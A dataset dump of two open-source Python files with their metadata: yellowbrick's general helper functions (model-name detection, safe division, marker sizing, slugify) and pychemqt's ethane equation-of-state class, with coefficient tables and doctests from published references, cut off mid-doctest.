bsd-3-clause
| 3,270,431,581,391,425,500
| 23.232877
| 74
| 0.58225
| false
| 3.509921
| false
| false
| false
|
pdamodaran/yellowbrick
|
yellowbrick/utils/helpers.py
|
1
|
6103
|
# yellowbrick.utils.helpers
# Helper functions and generic utilities for use in Yellowbrick code.
#
# Author: Benjamin Bengfort <bbengfort@districtdatalabs.com>
# Created: Fri May 19 10:39:30 2017 -0700
#
# Copyright (C) 2017 District Data Labs
# For license information, see LICENSE.txt
#
# ID: helpers.py [79cd8cf] benjamin@bengfort.com $
"""
Helper functions and generic utilities for use in Yellowbrick code.
"""
##########################################################################
## Imports
##########################################################################
import re
import numpy as np
from sklearn.pipeline import Pipeline
from .types import is_estimator
from yellowbrick.exceptions import YellowbrickTypeError
##########################################################################
## Model and Feature Information
##########################################################################
def get_model_name(model):
"""
Detects the model name for a Scikit-Learn model or pipeline.
Parameters
----------
model: class or instance
The object to determine the name for. If the model is an estimator it
returns the class name; if it is a Pipeline it returns the class name
of the final transformer or estimator in the Pipeline.
Returns
-------
name : string
The name of the model or pipeline.
"""
if not is_estimator(model):
raise YellowbrickTypeError(
"Cannot detect the model name for non estimator: '{}'".format(
type(model)
)
)
else:
if isinstance(model, Pipeline):
return get_model_name(model.steps[-1][-1])
else:
return model.__class__.__name__
def has_ndarray_int_columns(features, X):
""" Checks if numeric feature columns exist in ndarray """
_, ncols = X.shape
if not all(d.isdigit() for d in features if isinstance(d, str)) or not isinstance(X, np.ndarray):
return False
ndarray_columns = np.arange(0, ncols)
feature_cols = np.unique([int(d) for d in features])
return all(np.in1d(feature_cols, ndarray_columns))
# Alias for closer name to isinstance and issubclass
hasndarrayintcolumns = has_ndarray_int_columns
def is_monotonic(a, increasing=True):
"""
Tests whether a vector a has monotonicity.
Parameters
----------
a : array-like
Array that should be tested for monotonicity
increasing : bool, default: True
        Test if the array is monotonically increasing, otherwise test if the
        array is monotonically decreasing.
"""
a = np.asarray(a) # ensure a is array-like
if a.ndim > 1:
raise ValueError("not supported for multi-dimensonal arrays")
if len(a) <= 1:
return True
if increasing:
return np.all(a[1:] >= a[:-1], axis=0)
return np.all(a[1:] <= a[:-1], axis=0)
##########################################################################
## Numeric Computations
##########################################################################
#From here: http://stackoverflow.com/questions/26248654/numpy-return-0-with-divide-by-zero
def div_safe( numerator, denominator ):
"""
Ufunc-extension that returns 0 instead of nan when dividing numpy arrays
Parameters
----------
numerator: array-like
    denominator: scalar or array-like by which the numerator can be validly divided
returns a numpy array
example: div_safe( [-1, 0, 1], 0 ) == [0, 0, 0]
"""
#First handle scalars
if np.isscalar(numerator):
raise ValueError("div_safe should only be used with an array-like numerator")
#Then numpy arrays
try:
with np.errstate(divide='ignore', invalid='ignore'):
result = np.true_divide( numerator, denominator )
result[ ~ np.isfinite( result )] = 0 # -inf inf NaN
return result
except ValueError as e:
raise e
def prop_to_size(vals, mi=0.0, ma=5.0, power=0.5, log=False):
"""
Converts an array of property values (e.g. a metric or score) to values
that are more useful for marker sizes, line widths, or other visual
sizes. The new sizes are computed as:
        y = mi + (ma - mi) \left( \frac{x_i - \min(x)}{\max(x) - \min(x)} \right)^{power}
If ``log=True``, the natural logarithm of the property values is used instead.
Parameters
----------
    vals : array-like, 1D
An array of values of the property to scale between the size range.
mi : float, default: 0.0
The size to assign the smallest property (minimum size value).
ma : float, default: 5.0
The size to assign the largest property (maximum size value).
power : float, default: 0.5
Used to control how rapidly the size increases from smallest to largest.
log : bool, default: False
Use the natural logarithm to compute the property sizes
Returns
-------
sizes : array, 1D
        The new size values, in the same shape as the input vals array
"""
# ensure that prop is an array
vals = np.asarray(vals)
# apply natural log if specified
if log:
vals = np.log(vals)
# avoid division by zero error
delta = vals.max() - vals.min()
if delta == 0.0:
delta = 1.0
    return mi + (ma - mi) * ((vals - vals.min()) / delta) ** power
##########################################################################
## String Computations
##########################################################################
def slugify(text):
"""
Returns a slug of given text, normalizing unicode data for file-safe
strings. Used for deciding where to write images to disk.
Parameters
----------
text : string
The string to slugify
Returns
-------
slug : string
A normalized slug representation of the text
.. seealso:: http://yashchandra.com/2014/05/08/how-to-generate-clean-url-or-a-slug-in-python/
"""
slug = re.sub(r'[^\w]+', ' ', text)
slug = "-".join(slug.lower().strip().split())
return slug
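if __name__ == '__main__':
    # Quick illustrative checks of the helpers above with toy inputs
    # (not part of the library API):
    print(is_monotonic([1, 2, 3]))                 # True
    print(div_safe([-1, 0, 1], 0))                 # [0. 0. 0.]
    print(prop_to_size([1, 10, 100], mi=1, ma=5))  # scaled marker sizes
    print(slugify("Hello, World!"))                # hello-world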
|
apache-2.0
| 4,644,387,337,907,354,000
| 28.626214
| 101
| 0.574144
| false
| 4.235253
| false
| false
| false
|
edusegzy/pychemqt
|
lib/mEoS/C2.py
|
1
|
34267
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
from lib.meos import MEoS
from lib import unidades
class C2(MEoS):
"""Multiparameter equation of state for ethane"""
name = "ethane"
CASNumber = "74-84-0"
formula = "CH3CH3"
synonym = "R-170"
rhoc = unidades.Density(206.18)
Tc = unidades.Temperature(305.322)
Pc = unidades.Pressure(4872.2, "kPa")
M = 30.06904 # g/mol
Tt = unidades.Temperature(90.368)
Tb = unidades.Temperature(184.569)
f_acent = 0.0995
momentoDipolar = unidades.DipoleMoment(0.0, "Debye")
id = 3
_Tr = unidades.Temperature(295.159630)
_rhor = unidades.Density(207.557649)
_w = 0.095234716
Fi1 = {"R": 8.314472,
"ao_log": [1, 3.003039265],
"pow": [0, 1],
"ao_pow": [9.212802589, -4.68224855],
"ao_exp": [1.117433359, 3.467773215, 6.941944640, 5.970850948],
"titao": [1.4091052332, 4.0099170712, 6.5967098342, 13.9798102659]}
Fi2 = {"ao_log": [1, 3.00263],
"pow": [0, 1],
"ao_pow": [24.675437527, -77.42531376],
"ao_exp": [], "titao": [],
"ao_hyp": [4.33939, 1.23722, 13.1974, -6.01989],
"hyp": [1.831882406, 0.731306621, 3.378007481, 3.508721939]}
Fi3 = {"ao_log": [1, 3.8159476],
"pow": [0, -1./3, -2./3, -1],
"ao_pow": [-23.446765, 8.6021299, -3.3075735, -.55956678],
"ao_exp": [5.0722267], "titao": [5.5074874],
"ao_hyp": [], "hyp": []}
CP5 = {"ao": 9.9507922459,
"an": [-6.9341406909e5, 3.1534834135e4, -6.103375287e2,
-2.8657877948e-2, 9.0922897821e-5, -5.2750109915e-8],
"pow": [-3, -2, -1.001, 1, 2, 3],
"ao_exp": [-1.4243593411e1], "exp": [3000],
"ao_hyp": [], "hyp": []}
helmholtz1 = {
"__type__": "Helmholtz",
"__name__": "Helmholtz equation of state for ethane of Buecker and Wagner (2006)",
"__doi__": {"autor": "Bücker, D., Wagner, W.",
"title": "A Reference Equation of State for the Thermodynamic Properties of Ethane for Temperatures from the Melting Line to 675 K and Pressures up to 900 MPa",
"ref": "J. Phys. Chem. Ref. Data 35, 205 (2006)",
"doi": "10.1063/1.1859286"},
"__test__":
# Table 29, Pag 238
"""
>>> st=C2(T=90.368, x=0.5)
>>> print "%0.6g %0.7f %0.5f %0.6f %0.5g %0.5g %0.4g %0.4g %0.4g %0.3f %0.4g %0.4g %0.2f %0.2f" % (\
st.T, st.P.MPa, st.Liquido.rho, st.Gas.rho, st.Liquido.h.kJkg, st.Gas.h.kJkg, \
st.Liquido.s.kJkgK, st.Gas.s.kJkgK, st.Liquido.cv.kJkgK, st.Gas.cv.kJkgK, \
st.Liquido.cp.kJkgK, st.Gas.cp.kJkgK, st.Liquido.w, st.Gas.w)
90.368 0.0000011 651.52948 0.000046 -888.9 -294.12 -5.058 1.524 1.605 0.892 2.326 1.168 2008.69 180.93
>>> st=C2(T=100, x=0.5)
>>> print "%0.6g %0.6f %0.5f %0.5f %0.5g %0.5g %0.4g %0.4g %0.4g %0.3f %0.4g %0.4g %0.2f %0.2f" % (\
st.T, st.P.MPa, st.Liquido.rho, st.Gas.rho, st.Liquido.h.kJkg, st.Gas.h.kJkg, \
st.Liquido.s.kJkgK, st.Gas.s.kJkgK, st.Liquido.cv.kJkgK, st.Gas.cv.kJkgK, \
st.Liquido.cp.kJkgK, st.Gas.cp.kJkgK, st.Liquido.w, st.Gas.w)
100 0.000011 640.94852 0.00040 -866.74 -282.78 -4.825 1.015 1.541 0.911 2.283 1.187 1938.44 189.86
>>> st=C2(T=130, x=0.5)
>>> print "%0.6g %0.6f %0.5f %0.5f %0.5g %0.5g %0.3f %0.3f %0.3f %0.3f %0.3f %0.3f %0.2f %0.2f" % (\
st.T, st.P.MPa, st.Liquido.rho, st.Gas.rho, st.Liquido.h.kJkg, st.Gas.h.kJkg, \
st.Liquido.s.kJkgK, st.Gas.s.kJkgK, st.Liquido.cv.kJkgK, st.Gas.cv.kJkgK, \
st.Liquido.cp.kJkgK, st.Gas.cp.kJkgK, st.Liquido.w, st.Gas.w)
130 0.001284 607.82999 0.03576 -798.36 -246.43 -4.227 0.019 1.462 0.977 2.293 1.256 1722.03 214.69
>>> st=C2(T=150, x=0.5)
>>> print "%0.6g %0.6f %0.5f %0.5f %0.5g %0.5g %0.3f %0.3f %0.3f %0.3f %0.3f %0.3f %0.2f %0.2f" % (\
st.T, st.P.MPa, st.Liquido.rho, st.Gas.rho, st.Liquido.h.kJkg, st.Gas.h.kJkg, \
st.Liquido.s.kJkgK, st.Gas.s.kJkgK, st.Liquido.cv.kJkgK, st.Gas.cv.kJkgK, \
st.Liquido.cp.kJkgK, st.Gas.cp.kJkgK, st.Liquido.w, st.Gas.w)
150 0.009638 585.16884 0.23373 -752.12 -221.71 -3.896 -0.360 1.442 1.027 2.333 1.312 1575.53 228.84
>>> st=C2(T=180, x=0.5)
>>> print "%0.6g %0.6f %0.5f %0.5f %0.5g %0.5g %0.3f %0.3f %0.3f %0.3f %0.3f %0.3f %0.2f %0.2f" % (\
st.T, st.P.MPa, st.Liquido.rho, st.Gas.rho, st.Liquido.h.kJkg, st.Gas.h.kJkg, \
st.Liquido.s.kJkgK, st.Gas.s.kJkgK, st.Liquido.cv.kJkgK, st.Gas.cv.kJkgK, \
st.Liquido.cp.kJkgK, st.Gas.cp.kJkgK, st.Liquido.w, st.Gas.w)
180 0.078638 549.50874 1.62533 -680.84 -185.53 -3.464 -0.712 1.434 1.098 2.421 1.409 1350.47 245.54
>>> st=C2(T=210, x=0.5)
>>> print "%0.6g %0.6f %0.5f %0.5f %0.5g %0.5g %0.3f %0.3f %0.3f %0.3f %0.3f %0.3f %0.2f %0.2f" % (\
st.T, st.P.MPa, st.Liquido.rho, st.Gas.rho, st.Liquido.h.kJkg, st.Gas.h.kJkg, \
st.Liquido.s.kJkgK, st.Gas.s.kJkgK, st.Liquido.cv.kJkgK, st.Gas.cv.kJkgK, \
st.Liquido.cp.kJkgK, st.Gas.cp.kJkgK, st.Liquido.w, st.Gas.w)
210 0.333796 510.45075 6.23900 -605.9 -153.48 -3.081 -0.927 1.454 1.228 2.572 1.622 1117.27 254.02
>>> st=C2(T=240, x=0.5)
>>> print "%0.6g %0.6f %0.5f %0.5f %0.5g %0.5g %0.3f %0.3f %0.3f %0.3f %0.3f %0.3f %0.2f %0.2f" % (\
st.T, st.P.MPa, st.Liquido.rho, st.Gas.rho, st.Liquido.h.kJkg, st.Gas.h.kJkg, \
st.Liquido.s.kJkgK, st.Gas.s.kJkgK, st.Liquido.cv.kJkgK, st.Gas.cv.kJkgK, \
st.Liquido.cp.kJkgK, st.Gas.cp.kJkgK, st.Liquido.w, st.Gas.w)
240 0.966788 465.30887 17.43487 -524.72 -128.82 -2.726 -1.077 1.507 1.388 2.847 1.976 873.25 252.14
>>> st=C2(T=270, x=0.5)
>>> print "%0.6g %0.6f %0.5f %0.5f %0.5g %0.5g %0.3f %0.3f %0.3f %0.3f %0.3f %0.3f %0.2f %0.2f" % (\
st.T, st.P.MPa, st.Liquido.rho, st.Gas.rho, st.Liquido.h.kJkg, st.Gas.h.kJkg, \
st.Liquido.s.kJkgK, st.Gas.s.kJkgK, st.Liquido.cv.kJkgK, st.Gas.cv.kJkgK, \
st.Liquido.cp.kJkgK, st.Gas.cp.kJkgK, st.Liquido.w, st.Gas.w)
270 2.209980 407.71776 42.08922 -432.13 -118.38 -2.375 -1.212 1.605 1.595 3.491 2.815 608.92 237.02
>>> st=C2(T=300, x=0.5)
>>> print "%0.6g %0.6f %0.5f %0.5f %0.5g %0.5g %0.3f %0.3f %0.3f %0.3f %0.3f %0.3f %0.2f %0.2f" % (\
st.T, st.P.MPa, st.Liquido.rho, st.Gas.rho, st.Liquido.h.kJkg, st.Gas.h.kJkg, \
st.Liquido.s.kJkgK, st.Gas.s.kJkgK, st.Liquido.cv.kJkgK, st.Gas.cv.kJkgK, \
st.Liquido.cp.kJkgK, st.Gas.cp.kJkgK, st.Liquido.w, st.Gas.w)
300 4.357255 303.50879 114.50091 -305.32 -155.61 -1.952 -1.453 1.912 2.089 10.022 13.299 274.91 200.51
>>> st=C2(T=305, x=0.5)
>>> print "%0.6g %0.6f %0.5f %0.5f %0.5g %0.5g %0.3f %0.3f %0.3f %0.3f %0.3f %0.3f %0.2f %0.2f" % (\
st.T, st.P.MPa, st.Liquido.rho, st.Gas.rho, st.Liquido.h.kJkg, st.Gas.h.kJkg, \
st.Liquido.s.kJkgK, st.Gas.s.kJkgK, st.Liquido.cv.kJkgK, st.Gas.cv.kJkgK, \
st.Liquido.cp.kJkgK, st.Gas.cp.kJkgK, st.Liquido.w, st.Gas.w)
305 4.839225 241.96149 170.75482 -255.73 -202.19 -1.794 -1.619 2.470 2.623 164.093 247.460 175.12 178.83
"""
# Table 30, Pag 243
"""
>>> st=C2(T=90.384, P=1e5)
>>> print "%0.6g %0.5g %0.5g %0.5g %0.5g %0.5g %0.5g %0.6g" % (\
st.T, st.rho, st.u.kJkg, st.h.kJkg, st.s.kJkgK, st.cv.kJkgK, st.cp.kJkgK, st.w)
90.384 651.55 -888.88 -888.73 -5.0574 1.6051 2.3256 2008.97
>>> st=C2(T=135, P=5e5)
>>> print "%0.6g %0.5g %0.5g %0.5g %0.5g %0.5g %0.5g %0.6g" % (\
st.T, st.rho, st.u.kJkg, st.h.kJkg, st.s.kJkgK, st.cv.kJkgK, st.cp.kJkgK, st.w)
135 602.5 -787.09 -786.26 -4.1415 1.4563 2.3009 1688.21
>>> st=C2(T=220, P=1e6)
>>> print "%0.6g %0.5g %0.5g %0.5g %0.5g %0.5g %0.5g %0.6g" % (\
st.T, st.rho, st.u.kJkg, st.h.kJkg, st.s.kJkgK, st.cv.kJkgK, st.cp.kJkgK, st.w)
220 497.12 -581.36 -579.35 -2.9641 1.4681 2.6365 1044.02
>>> st=C2(T=110, P=1.5e6)
>>> print "%0.6g %0.5g %0.5g %0.5g %0.5g %0.5g %0.5g %0.6g" % (\
st.T, st.rho, st.u.kJkg, st.h.kJkg, st.s.kJkgK, st.cv.kJkgK, st.cp.kJkgK, st.w)
110 630.62 -844.43 -842.05 -4.6118 1.5041 2.2713 1872.62
>>> st=C2(T=675, P=2e6)
>>> print "%0.6g %0.5g %0.5g %0.5g %0.5g %0.5g %0.5g %0.6g" % (\
st.T, st.rho, st.u.kJkg, st.h.kJkg, st.s.kJkgK, st.cv.kJkgK, st.cp.kJkgK, st.w)
675 10.756 754.73 940.67 1.1385 2.9468 3.2442 451.69
>>> st=C2(T=310, P=5e6)
>>> print "%0.6g %0.5g %0.5g %0.5g %0.5g %0.5g %0.5g %0.6g" % (\
st.T, st.rho, st.u.kJkg, st.h.kJkg, st.s.kJkgK, st.cv.kJkgK, st.cp.kJkgK, st.w)
310 123.88 -181.86 -141.49 -1.4246 1.9621 8.6868 211.1
>>> st=C2(T=160, P=1e7)
>>> print "%0.6g %0.5g %0.5g %0.5g %0.5g %0.5g %0.5g %0.6g" % (\
st.T, st.rho, st.u.kJkg, st.h.kJkg, st.s.kJkgK, st.cv.kJkgK, st.cp.kJkgK, st.w)
160 580.45 -734.04 -716.81 -3.7788 1.4493 2.3263 1563.69
>>> st=C2(T=500, P=2e7)
>>> print "%0.6g %0.5g %0.5g %0.5g %0.5g %0.5g %0.5g %0.5g" % (\
st.T, st.rho, st.u.kJkg, st.h.kJkg, st.s.kJkgK, st.cv.kJkgK, st.cp.kJkgK, st.w)
500 164.96 184.25 305.49 -0.5687 2.3996 3.2172 416.34
>>> st=C2(T=100, P=5e7)
>>> print "%0.6g %0.5g %0.5g %0.5g %0.5g %0.5g %0.5g %0.6g" % (\
st.T, st.rho, st.u.kJkg, st.h.kJkg, st.s.kJkgK, st.cv.kJkgK, st.cp.kJkgK, st.w)
100 658.54 -877.76 -801.84 -4.9448 1.6011 2.2516 2107.34
>>> st=C2(T=450, P=1e8)
>>> print "%0.6g %0.5g %0.5g %0.5g %0.5g %0.5g %0.5g %0.6g" % (\
st.T, st.rho, st.u.kJkg, st.h.kJkg, st.s.kJkgK, st.cv.kJkgK, st.cp.kJkgK, st.w)
450 428.87 -108.47 124.7 -1.471 2.2729 2.9465 1075.84
>>> st=C2(T=675, P=9e8)
>>> print "%0.6g %0.5g %0.5g %0.6g %0.5g %0.5g %0.5g %0.6g" % (\
st.T, st.rho, st.u.kJkg, st.h.kJkg, st.s.kJkgK, st.cv.kJkgK, st.cp.kJkgK, st.w)
675 632.88 443.09 1865.16 -0.95311 3.2264 3.638 2628.58
""",
"R": 8.314472,
"cp": Fi1,
"ref": "OTO",
"Tmin": Tt, "Tmax": 675.0, "Pmax": 900000.0, "rhomax": 22.419,
"Pmin": 0.00114, "rhomin": 21.668,
"nr1": [0.83440745735241, -0.14287360607171e1, 0.34430242210927,
-0.42096677920265, 0.12094500886549e-1],
"d1": [1, 1, 2, 2, 4],
"t1": [0.25, 1.00, 0.25, 0.75, 0.75],
"nr2": [-0.57976201597341, -0.33127037870838e-1, -0.11751654894130,
-0.11160957833067, 0.62181592654406e-1, 0.98481795434443e-1,
-0.98268582682358e-1, -0.23977831007049e-3, 0.69885663328821e-3,
0.19665987803305e-4, -0.14586152207928e-1, 0.46354100536781e-1,
0.60764622180645e-2, -0.26447330147828e-2, -0.42931872689904e-1,
0.29987786517263e-2, 0.52919335175010e-2, -0.10383897798198e-2,
-0.54260348214694e-1, -0.21959362918493, 0.35362456650354,
-0.12477390173714, 0.18425693591517, -0.16192256436754,
-0.82770876149064e-1, 0.50160758096437e-1, 0.93614326336655e-2,
-0.27839186242864e-3, 0.23560274071481e-4, 0.39238329738527e-2,
-0.76488325813618e-3, -0.49944304440730e-2,
0.18593386407186e-2, -0.61404353331199e-3],
"d2": [1, 1, 2, 2, 3, 6, 6, 7, 9, 10, 2, 4, 4, 5, 5, 6, 8, 9, 2, 3, 3,
3, 4, 4, 5, 5, 6, 11, 14, 3, 3, 4, 8, 10],
"t2": [2.00, 4.25, 0.75, 2.25, 3.00, 1.00, 1.25, 2.75, 1.00, 2.00,
2.50, 5.50, 7.00, 0.50, 5.50, 2.50, 4.00, 2.00, 10.00, 16.00,
18.00, 20.00, 14.00, 18.00, 12.00, 19.00, 7.00, 15.00, 9.00,
26.00, 28.00, 28.00, 22.00, 13.00],
"c2": [1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 2, 2, 2, 2, 2, 2, 2, 2, 3, 3, 3,
3, 3, 3, 3, 3, 3, 3, 3, 4, 4, 4, 4, 4],
"gamma2": [1]*34,
"nr3": [-0.23312179367924e-2, 0.29301047908760e-2, -0.26912472842883e-3,
0.18413834111814e3, -0.10397127984854e2],
"d3": [1, 1, 3, 3, 2],
"t3": [0., 3., 3., 0., 3.],
"alfa3": [15, 15, 15, 20, 20],
"beta3": [150, 150, 150, 275, 400],
"gamma3": [1.05, 1.05, 1.05, 1.22, 1.16],
"epsilon3": [1]*5}
MBWR = {
"__type__": "MBWR",
"__name__": "MBWR equation of state for ethane of Younglove and Ely (1987)",
"__doi__": {"autor": "Younglove, B.A. and Ely, J.F.",
"title": "Thermophysical Properties of Fluids. II. Methane, Ethane, Propane, Isobutane, and Normal Butane ",
"ref": "J. Phys. Chem. Ref. Data 16, 577 (1987)",
"doi": "10.1063/1.555785"},
"R": 8.31434,
"cp": CP5,
"ref": {"Tref": 298.15, "Pref": 101.325, "ho": 11874.2, "so": 229.116},
"Tmin": 90.348, "Tmax": 600.0, "Pmax": 70000.0, "rhomax": 21.68,
"Pmin": 1.1308e-3, "rhomin": 21.68,
"b": [None, -0.3204748852e-2, 0.6529792241, -0.1669704591e2,
0.1147983381e4, -0.1854721998e6, 0.4994149431e-3, -0.4858871291,
0.1225345776e3, 0.8622615988e5, -0.1081290283e-4, 0.6279096996e-1,
-0.1716912675e2, -0.1640779401e-3, -0.4356516111e-1, -0.1966649699e2,
0.4026724698e-2, -0.6498241861e-4, 0.5111594139e-1, -0.1113010349e-2,
-0.7157747547e4, -0.1848571024e8, -0.2137365569e4, 0.6275079986e8,
-0.9974911056e1, 0.1129115014e4, -0.1026469558, -0.5660525915e4,
-0.4209846430e-3, 0.2374523553, -0.1289637823e-5,
-0.5423801068e-3, 0.2239717230e-1]}
GERG = {
"__type__": "Helmholtz",
"__name__": "Helmholtz equation of state for ethane of Kunz and Wagner (2004).",
"__doi__": {"autor": "Kunz, O., Wagner, W.",
"title": "The GERG-2008 Wide-Range Equation of State for Natural Gases and Other Mixtures: An Expansion of GERG-2004",
"ref": "J. Chem. Eng. Data, 2012, 57 (11), pp 3032–3091",
"doi": "10.1021/je300655b"},
"R": 8.314472,
"cp": Fi2,
"ref": "OTO",
"Tmin": Tt, "Tmax": 675.0, "Pmax": 900000.0, "rhomax": 22.419,
# "Pmin": 0.61166, "rhomin": 55.497,
"nr1": [0.63596780450714, -0.17377981785459e1, 0.28914060926272,
-0.33714276845694, 0.22405964699561e-1, 0.15715424886913e-1],
"d1": [1, 1, 2, 2, 4, 4],
"t1": [0.125, 1.125, 0.375, 1.125, 0.625, 1.5],
"nr2": [0.11450634253745, 0.10612049379745e1, -0.12855224439423e1,
0.39414630777652, 0.31390924682041, -0.21592277117247e-1,
-0.21723666564905, -0.28999574439489, 0.42321173025732,
0.46434100259260e-1, -0.13138398329741, 0.11492850364368e-1,
-0.33387688429909e-1, 0.15183171583644e-1, -0.47610805647657e-2,
0.46917166277885e-1, -0.39401755804649e-1, -0.32569956247611e-2],
"d2": [1, 1, 1, 2, 3, 6, 2, 3, 3, 4, 4, 2, 3, 4, 5, 6, 6, 7],
"t2": [0.625, 2.625, 2.75, 2.125, 2, 1.75, 4.5, 4.75, 5, 4, 4.5, 7.5,
14, 11.5, 26, 28, 30, 16],
"c2": [1, 1, 1, 1, 1, 1, 2, 2, 2, 2, 2, 3, 3, 3, 6, 6, 6, 6],
"gamma2": [1]*18}
helmholtz3 = {
"__type__": "Helmholtz",
"__name__": "Helmholtz equation of state for ethane of Friend et al. (1991)",
"__doi__": {"autor": "Friend, D.G., Ingham, H., and Ely, J.F.",
"title": "Thermophysical Properties of Ethane",
"ref": "J. Phys. Chem. Ref. Data 20, 275 (1991)",
"doi": "10.1063/1.555881"},
"__test__":
# Table A1, Pag 336
"""
>>> st=C2(T=500, P=1e5, eq=3)
>>> print "%0.6g %0.1f %0.3f %0.3f %0.3f %0.3f %0.2f" % (\
st.T, st.aM0.kJkmol, st.hM0.kJkmol, st.sM0.kJkmolK, st.cpM0.kJkmolK)
500 -110.311 25.059 262.43 77.987
"""
# Table A2, Pag 337
"""
>>> st=C2(T=92, x=0.5, eq=3)
>>> print "%0.6g %0.1e %0.2f %0.2e %0.2f %0.1f %0.2f %0.1f" % (\
st.T, st.P.MPa, st.Liquido.rhoM, st.Gas.rhoM, st.Liquido.cpM.JmolK, \
st.Liquido.w, st.Liquido.mu.muPas, st.Liquido.k.mWmK)
92 1.7e-06 21.61 2.27e-06 67.74 1987.2 1193.00 254.4
>>> st=C2(T=100, x=0.5, eq=3)
>>> print "%0.6g %0.1e %0.2f %0.2e %0.2f %0.1f %0.2f %0.1f" % (\
st.T, st.P.MPa, st.Liquido.rhoM, st.Gas.rhoM, st.Liquido.cpM.JmolK, \
st.Liquido.w, st.Liquido.mu.muPas, st.Liquido.k.mWmK)
100 1.1e-05 21.32 1.33e-05 70.09 1937.6 876.96 248.1
>>> st=C2(T=150, x=0.5, eq=3)
>>> print "%0.6g %0.1e %0.2f %0.2e %0.2f %0.1f %0.2f %0.1f" % (\
st.T, st.P.MPa, st.Liquido.rhoM, st.Gas.rhoM, st.Liquido.cpM.JmolK, \
st.Liquido.w, st.Liquido.mu.muPas, st.Liquido.k.mWmK)
150 9.7e-3 19.47 7.80e-3 70.27 1573.2 270.35 201.0
>>> st=C2(T=200, x=0.5, eq=3)
>>> print "%0.6g %0.3f %0.2f %0.3f %0.2f %0.1f %0.2f %0.1f" % (\
st.T, st.P.MPa, st.Liquido.rhoM, st.Gas.rhoM, st.Liquido.cpM.JmolK, \
st.Liquido.w, st.Liquido.mu.muPas, st.Liquido.k.mWmK)
200 0.217 17.42 0.139 74.86 1194.4 138.17 152.5
>>> st=C2(T=250, x=0.5, eq=3)
>>> print "%0.6g %0.3f %0.2f %0.3f %0.2f %0.1f %0.2f %0.1f" % (\
st.T, st.P.MPa, st.Liquido.rhoM, st.Gas.rhoM, st.Liquido.cpM.JmolK, \
st.Liquido.w, st.Liquido.mu.muPas, st.Liquido.k.mWmK)
250 1.301 14.89 0.787 87.29 794.6 78.06 109.1
>>> st=C2(T=300, x=0.5, eq=3)
>>> print "%0.6g %0.3f %0.2f %0.3f %0.2f %0.1f %0.2f %0.1f" % (\
st.T, st.P.MPa, st.Liquido.rhoM, st.Gas.rhoM, st.Liquido.cpM.JmolK, \
st.Liquido.w, st.Liquido.mu.muPas, st.Liquido.k.mWmK)
300 4.356 10.10 3.813 182.06 278.4 35.01 71.3
>>> st=C2(T=302, x=0.5, eq=3)
>>> print "%0.6g %0.3f %0.2f %0.3f %0.2f %0.1f %0.2f %0.1f" % (\
st.T, st.P.MPa, st.Liquido.rhoM, st.Gas.rhoM, st.Liquido.cpM.JmolK, \
st.Liquido.w, st.Liquido.mu.muPas, st.Liquido.k.mWmK)
302 4.543 9.59 4.262 223.66 246.4 32.44 72.0
>>> st=C2(T=304, rhom=8.82, eq=3)
>>> print "%0.6g %0.3f %0.2f %0.3f %0.2f %0.1f %0.2f %0.1f" % (\
st.T, st.P.MPa, st.Liquido.rhoM, st.Gas.rhoM, st.Liquido.cpM.JmolK, \
st.Liquido.w, st.Liquido.mu.muPas, st.Liquido.k.mWmK)
304 4.738 8.82 4.969 354.78 209.4 28.97 79.0
"""
# Table A3, Pag 339
"""
>>> st=C2(T=130, P=1e6, eq=3)
>>> print "%0.6g %0.2g %0.2f %0.3f %0.2f %0.2f %0.2f %0.1f %0.2f %0.1f" % (\
st.T, st.P.MPa, st.rhoM, st.hM.kJmol, st.sM.JmolK, st.cvM.JmolK, \
st.cpM.JmolK, st.w, st.mu.muPas, st.k.mWmK)
130 1 20.24 -12.071 102.03 45.01 70.10 1726.9 392.40 221.3
>>> st=C2(T=140, P=6e7, eq=3)
>>> print "%0.6g %0.2g %0.2f %0.3f %0.2f %0.2f %0.2f %0.1f %0.2f %0.1f" % (\
st.T, st.P.MPa, st.rhoM, st.hM.kJmol, st.sM.JmolK, st.cvM.JmolK, \
st.cpM.JmolK, st.w, st.mu.muPas, st.k.mWmK)
140 60 20.80 -9.131 102.52 46.34 67.67 1921.7 476.29 245.7
>>> st=C2(T=160, P=2e6, eq=3)
>>> print "%0.6g %0.2g %0.2f %0.3f %0.2f %0.2f %0.2f %0.1f %0.2f %0.1f" % (\
st.T, st.P.MPa, st.rhoM, st.hM.kJmol, st.sM.JmolK, st.cvM.JmolK, \
st.cpM.JmolK, st.w, st.mu.muPas, st.k.mWmK)
160 2 19.13 -9.933 116.48 43.04 70.44 1511.1 235.10 192.5
>>> st=C2(T=180, P=1e5, eq=3)
>>> print "%0.6g %0.2g %0.2f %0.3f %0.2f %0.2f %0.2f %0.1f %0.2f %0.1f" % (\
st.T, st.P.MPa, st.rhoM, st.hM.kJmol, st.sM.JmolK, st.cvM.JmolK, \
st.cpM.JmolK, st.w, st.mu.muPas, st.k.mWmK)
180 0.1 18.28 -8.571 125.09 42.65 72.41 1347.8 176.42 171.5
>>> st=C2(T=200, P=1e7, eq=3)
>>> print "%0.6g %0.2g %0.2f %0.3f %0.2f %0.2f %0.2f %0.1f %0.2f %0.1f" % (\
st.T, st.P.MPa, st.rhoM, st.hM.kJmol, st.sM.JmolK, st.cvM.JmolK, \
st.cpM.JmolK, st.w, st.mu.muPas, st.k.mWmK)
200 10 17.79 -6.804 131.51 43.41 73.00 1281.7 151.38 161.5
>>> st=C2(T=240, P=1e6, eq=3)
>>> print "%0.6g %0.2g %0.2f %0.3f %0.2f %0.2f %0.2f %0.1f %0.2f %0.1f" % (\
st.T, st.P.MPa, st.rhoM, st.hM.kJmol, st.sM.JmolK, st.cvM.JmolK, \
st.cpM.JmolK, st.w, st.mu.muPas, st.k.mWmK)
240 1 15.47 -3.894 147.18 44.93 85.36 878.8 87.70 117.4
>>> st=C2(T=270, P=2e6, eq=3)
>>> print "%0.6g %0.2g %0.2f %0.3f %0.2f %0.2f %0.2f %0.1f %0.2f %0.1f" % (\
st.T, st.P.MPa, st.rhoM, st.hM.kJmol, st.sM.JmolK, st.cvM.JmolK, \
st.cpM.JmolK, st.w, st.mu.muPas, st.k.mWmK)
270 2 1.20 8.589 194.29 47.40 76.57 245.2 9.33 21.6
>>> st=C2(T=280, P=5e6, eq=3)
>>> print "%0.6g %0.2g %0.2f %0.3f %0.2f %0.2f %0.2f %0.1f %0.2f %0.1f" % (\
st.T, st.P.MPa, st.rhoM, st.hM.kJmol, st.sM.JmolK, st.cvM.JmolK, \
st.cpM.JmolK, st.w, st.mu.muPas, st.k.mWmK)
